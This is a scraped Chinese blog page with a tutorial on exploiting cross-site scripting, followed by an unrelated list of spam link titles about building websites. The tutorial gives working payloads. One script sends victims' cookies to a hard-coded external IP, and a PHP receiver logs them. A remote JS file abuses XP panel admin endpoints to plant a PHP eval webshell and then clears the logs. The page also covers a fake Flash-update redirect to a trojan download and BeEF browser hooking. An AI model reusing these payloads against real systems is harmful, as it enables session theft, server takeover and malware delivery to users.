当前位置: 首页 > news >正文

专业的集团网站开发开发买房子平台

专业的集团网站开发开发,买房子平台,wordpress 主页图片不显示,电子商务网站的建设与规划书目录 XSS跨站-攻击利用-凭据盗取 XSS跨站-攻击利用-数据提交 XSS跨站-攻击利用-flash钓鱼 XSS跨站-攻击利用-溯源综合 知识点#xff1a; 1、XSS跨站-攻击利用-凭据盗取 2、XSS跨站-攻击利用-数据提交 3、XSS跨站-攻击利用-网络钓鱼 4、XSS跨站-攻击利用-溯源综合 漏洞原理…目录 XSS跨站-攻击利用-凭据盗取 XSS跨站-攻击利用-数据提交 XSS跨站-攻击利用-flash钓鱼 XSS跨站-攻击利用-溯源综合 知识点 1、XSS跨站-攻击利用-凭据盗取 2、XSS跨站-攻击利用-数据提交 3、XSS跨站-攻击利用-网络钓鱼 4、XSS跨站-攻击利用-溯源综合 漏洞原理接受输入数据输出显示数据后解析执行 基础类型反射(非持续)存储(持续)DOM-BASE 拓展类型jquerymxssuxsspdfxssflashxss上传xss等 常用标签https://www.freebuf.com/articles/web/340080.html 攻击利用盲打COOKIE盗取凭据窃取页面劫持网络钓鱼权限维持等 安全修复字符过滤实例化编码http_onlyCSP防护WAF拦截等 测试流程看输出想输入在哪里更改输入代码看执行标签过滤决定 XSS跨站-攻击利用-凭据盗取 条件无防护Cookie凭据获取 把该XSS源码放到外网服务器上运行 登录前台测试账号 当用户申请提现时管理员后台是能看到一些申请体现信息这时候就会产生XSS漏洞 成功进入后台 触发代码 scriptvar urlhttp://47.94.236.117/getcookie.php?uwindow.location.hrefcdocument.cookie;document.write(img srcurl /);/script47.94.236.117服务器上写一个getcookie.php脚本 接受 ?php $url$_GET[u]; $cookie$_GET[c]; $fp fopen(cookie.txt,a); fwrite($fp,$url.|.$cookie.\n); fclose($fp); ?XSS跨站-攻击利用-数据提交 条件熟悉后台业务功能数据包利用JS写一个模拟提交 利用凭据获取不到或有防护无法利用凭据进入时执行其他 payload: script srchttp://xx.xxx.xxx/poc.js/scriptpoc.js //要放在外网服务器WEB目录下这个代码专门针对小皮面板写的 function poc(){js$.get(/service/app/tasks.php?typetask_list,{},function(data){var iddata.data[0].ID;$.post(/service/app/tasks.php?typeexec_task,{tid:id},function(res2){$.post(/service/app/log.php?typeclearlog,{},function(res3){},json);},json);},json); } function save(){var datanew Object();data.task_id;data.titletest;data.exec_cycle1;data.week1;data.day3;data.hour14;data.minute 20;data.shellecho ?php eval($_POST[123]);? C:/xp.cn/www/wwwroot/admin/localhost_80/wwwroot/1.php;$.post(/service/app/tasks.php?typesave_shell,data,function(res){poc();},json); } save();管理员登陆后查看日志触发 XSS跨站-攻击利用-flash钓鱼 部署可访问的钓鱼页面并修改 点击立即下载后就会下载木马文件 植入XSS代码等待受害者触发 scriptalert(当前浏览器Flash版本过低请下载升级);location.hrefhttp://x.x.x.x/flash/script点击确定后就会来到准备好的钓鱼页面立即下载地址就可以填木马地址 项目地址https://github.com/r00tSe7en/Fake-flash.cn XSS跨站-攻击利用-溯源综合 XSS数据平台-XSSReceiver(这是给个人搭建的XSS平台不想使用网上的XSS平台可以用这个项目) 简单配置即可使用无需数据库无需其他组件支持 项目地址https://github.com/epoch99/BlueLotus_XSSReceiver-master 搭建非常简单下载源码下来放入phpstudy目录下访问安装即可 浏览器控制框架-beef-xss 只需执行JS文件即可实现对当前浏览器的控制可配合各类手法利用 缺点如果对方浏览器关闭权限就会掉 搭建docker run --rm -p 3000:3000 janes/beef //安装命令 这个代码插入到网站首页html里这样当别人访问这个首页文件就会被劫持
http://www.tj-hxxt.cn/news/230661.html

相关文章:

  • 最好的开发网站建设大连公共资源交易平台官网
  • 做心悦腾龙光环的网站是什么湘阴网站建设
  • 怎么建网站赚钱秦皇岛市属于哪个省份
  • 网站代码 上传 wordpress 空间各地农业信息网站的建设
  • 美团招聘网站开发杭州久邦电力建设有限公司网站
  • 广州网站设计与制作公司技术支持 深圳网站建设贝尔利
  • 免费服务器搭建网站详细教程看设计比较好的网站
  • 什么是静态网站网站制作好如何上线
  • 化妆品销售网站开发与设计域名查询中国万网
  • 厦门 网站建设 网站开发 未来网络然后搭建网站
  • 常州模板建站哪家好怎么做58同城网站吗
  • 个人cms网站wordpress怎么上传pdf
  • php网站开发专业是做什么的wordpress打开图片预览代码
  • seo网站的锚文本怎么写网站建设论文答辩题目
  • 教育培训机构有关的网站做网站的外包公司可以进吗
  • 潍坊网站优化排名一个人做网站要多久
  • 深圳网站开发电话网页设计师多少钱一个月
  • 网站开发过程总结电脑打开做的网站总显示404
  • html网站留言板代码网站开发报价人天
  • 深圳网站优化排名公司狠狠做网站改成什么了
  • 微信小店可以做分类网站网站内链代码
  • 免费购物网站源码做网站购买域名
  • 做网站包头货运公司网站源码
  • 烟台网站推广排名中文域名指向同一个网站
  • 广东网站建设企业wordpress阿里巴巴图标
  • 上海住房建设部官方网站京东云免费建wordpress
  • 做网站需要人员wordpress 多条件
  • 网站建设方案流程wordpress手机发文章
  • 珠海网站品牌设计公司简介嘉兴优化网站收费标准
  • 咸阳建设网站wordpress改固定连接